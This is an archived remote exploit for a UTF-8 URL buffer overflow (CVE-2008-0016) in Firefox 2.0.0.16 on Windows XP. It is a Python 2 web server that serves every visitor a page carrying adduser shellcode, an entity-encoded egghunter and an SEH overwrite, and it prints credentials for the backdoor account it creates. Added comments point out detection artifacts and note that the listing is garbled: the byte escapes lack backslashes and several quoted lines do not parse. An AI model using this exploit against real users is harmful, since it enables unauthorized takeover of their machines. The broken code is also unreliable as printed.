
# Title : Mozilla Firefox 2.0.0.16 UTF-8 URL Remote Buffer Overflow Exploit
# Published : 2009-09-14
# Author : dmc


#!/usr/bin/python
# FireFox 2.0.0.16 Windows XP SP3 x86 Remote Exploit
# Author: Dominic Chell <dmc@deadbeef.co.uk>
#
# Exploits the UTF-8 URL overflow vulnerability described in CVE-2008-0016.
# As of September 2009 there are no public exploits for this vulnerability.
# However, according to securityfocus an exploit is available in both Canvas
# and Core Impact.
#
# Thanks to meta and ChrisA

from BaseHTTPServer import HTTPServer 
from BaseHTTPServer import BaseHTTPRequestHandler 
import sys 

# Adduser shellcode encoded with shikata_ga_nai
# USER=r00t PASS=r00tr00t!!
#
# This is the payload the egghunter (below) scans memory for; it is
# embedded in the served page inside a CDATA block, immediately after the
# 0x41424142 marker (see create_exploit_buffer).
# Defender note: the end result described by this script is a new local
# account "r00t" with the password above; that account, and an HTML body
# whose CDATA section begins with the marker bytes, are the artifacts to
# look for on a host or in captured traffic.
#
# NOTE(review): as printed on this page the byte escapes carry no
# backslashes ("xdaxd4..." rather than "\xda\xd4..."), so the literal is
# plain ASCII text; presumably a rendering artefact of the archive.
egg = (
	"xdaxd4x29xc9xb8xb3xfex8bx54xd9x74x24xf4xb1x32"
	"x5fx83xefxfcx31x47x14x03x47xa7x1cx7exa8x2fxa4"
	"x81x51xafxaexc7x6dx24xccxc2xf5x3bxc2x46x4ax23"
	"x97x06x75x52x4cxf1xfex60x19x03xefxb9xddx9dx43"
	"x3dx1dxe9x9cxfcx54x1fxa2x3cx83xd4x9fx94x70x11"
	"x95xf1xf2x46x71xf8xefx1fxf2xf6xa4x54x5bx1ax3a"
	"x80xefx3exb7x57x1bxb7x9bx73xdfx04x7cx4dx29xea"
	"xd5xc9x5exacxe9x9ax21x3cx81xedxbdx91x1ex65xb6"
	"x60xd8xf5x06x18x49x92x76x56x6dx3dx1fxfex90x4b"
	"xd1xa9x93xabx8dx38x08x1ax37xbaxb5x42x98x59x16"
	"xedx83xe9x76x84x38x74x05x46xcdx46xd9xf2x11xd4"
	"x29xcbx25x6ax7ax1bxb2xabx5bx7bx15xeaxdfx3fx49"
	"xcaxf9x9fxe7x77x72xc0x9bx18x19x61x08x81xafx0e"
	"xa5x3dx70x90x21xd0x19x7cxc3x59xaexf2x72xe9x21"
	"x81x07x31xccx55xd8x45x10xb9x59xe1x14xc5x53")

# Egghunter where egg is 0x41424142.
# The egghunter is encoded as HTML entities, this evades the unicode conversion.
# Egghunter courtesy of skape. Modified to xor edx,edx as first instruction.
#
# Each "&#xNNNN;" is a numeric character reference for one 16-bit value, so
# the hunter is carried in the page as text rather than as raw bytes; per
# the comment above that is what keeps it intact through the unicode
# conversion. The two "&#x4142;" references are the marker it searches
# for (the same bytes written before `egg` in the CDATA block). The
# "&#x9090;" references and the trailing "&#xcccc;" run appear to be
# padding around the hunter body.
shellcode = (
	"&#xD233;&#x9090;&#x9090;&#x4290;&#x6a52;&#x5802;&#x2ecd;"
	"&#x053c;&#x745a;&#xb8ef;&#x4142;&#x4142;&#xfa8b;&#x75af;"
	"&#xafea;&#xe775;&#xe7ff;&#xcccc;&#xcccc;&#xcccc;&#xcccc;"
	"&#xcccc;&#xcccc;&#xcccc;&#xcccc;")

# The UTF-8 character in the URL triggers the code path where the overflow occurs.
# The two-byte sequence is decoded and re-encoded (Python 2 str -> unicode -> str)
# so that utf8chars holds the character's UTF-8 bytes for the href built in
# create_exploit_buffer.
# NOTE(review): printed without backslashes ("xC3xBA"), the literal is four
# ASCII characters rather than the intended two-byte sequence.
s = "xC3xBA"
u = unicode(s, "utf-8")
utf8chars = u.encode( "utf-8" )

class myRequestHandler(BaseHTTPRequestHandler):
	"""Serve the exploit document to every client that requests "/".

	Nothing about the requesting client is checked (address, User-Agent,
	browser version); whatever fetches "/" receives the same response.
	"""

	def create_exploit_buffer(self):
		"""Build and return the HTML page that carries the overflow.

		Top to bottom: a meta tag declaring utf-8, a CDATA block holding the
		0x41424142 marker followed by the adduser payload (egg), then a single
		<a href> whose URL is the UTF-8 trigger character followed by
		entity-encoded filler, the SEH overwrite described in the inline
		comments, and the entity-encoded egghunter.  A run of 1700 "&#x9090;"
		references inside an href attribute is the most distinctive
		on-the-wire feature of this page and is what a content signature
		would key on.

		NOTE(review): as printed, the inner double quotes on the meta, href
		and closing-anchor lines are not escaped, so those lines do not parse;
		the backslashes appear to have been dropped when the listing was
		rendered (the bare "n" line endings suggest the same).
		"""
		html = "<meta http-equiv="Content-Type" content="text/html;charset=utf-8" />n<html>n<body>n"

		# Store the egg and adduser shellcode in CDATA
		# The egghunter will try and find this in memory
		html += "<!CDATA[" + "x42x41x42x41x42x41x42x41" + egg
		html += "]>n"

		# The href: a control byte, an unusual scheme, then the UTF-8
		# trigger character, then the overflow data.
		html += "<a href=""
		html += "x01"
		html += "xx://dmc"
		html += utf8chars
		html += "/"
		
		html += "&#x9090;" * 1700	# Windows XP SP3 SEH offset
		html += "&#4331;&#37008;"	# unicode - ptr to next seh "xebx10x90x90";
		html += "&#x11e7;&#x6037;"	# 0x603711e7 - pop/pop/ret - xpcom_core.dll
		html +="&#x9090;" * 10
		html += shellcode # add egghunter
		html +="&#x9090;" * 10
		html += "" >s</a>"
		html += "n</body>"
		html += "n</html>"
	
		return html

	def do_GET(self):
		"""Answer every GET with 200; send the exploit page when the path is "/".

		The status line and headers go out before the path check, so any
		other path gets a 200 with an empty body.  `target` is assigned but
		never used.  The "payload sent" message is printed as soon as the
		bytes are written; it says nothing about whether the client was
		actually affected.
		"""
		self.printCustomHTTPResponse(200)
		if self.path == "/":
			target=self.client_address[0]
			html = self.create_exploit_buffer()
			self.wfile.write(html)
			print "[*] Evil payload sentn[*] Wait a few minutes and try connecting with r00t/r00tr00t!!n"
			
	def printCustomHTTPResponse(self, respcode):
		"""Send the status line plus fixed Content-type and Server headers.

		The Server header is the literal "myRequestHandler", a distinctive
		value a network sensor could match on.
		"""
		self.send_response(respcode)
		self.send_header("Content-type", "text/html")
		self.send_header("Server", "myRequestHandler")
		self.end_headers()

# Script entry point (Python 2: print statements, BaseHTTPServer).  Runs at
# import time; there is no __main__ guard.
print "FireFox 2.0.0.16 x86 ExploitnAuthor: dmc@deadbeef.co.ukn"
print "[*] Starting evil web server"
print "[*] Waiting for clientsn"

# Bind TCP port 80 on every interface.  On Unix-like systems a port below
# 1024 typically requires elevated privileges; a bind failure here is
# outside the try below and propagates as an uncaught socket error.
httpd = HTTPServer(('', 80), myRequestHandler)

try:
	# handle_request() serves exactly one request; serve_forever() then
	# loops until interrupted, so the first call is redundant.
	httpd.handle_request()
	httpd.serve_forever() 
except KeyboardInterrupt:
	# Only Ctrl-C is handled; the server is not shut down explicitly
	# before exiting.
	print "nn[*] Interupt caught, exiting.nn"
	sys.exit(1)
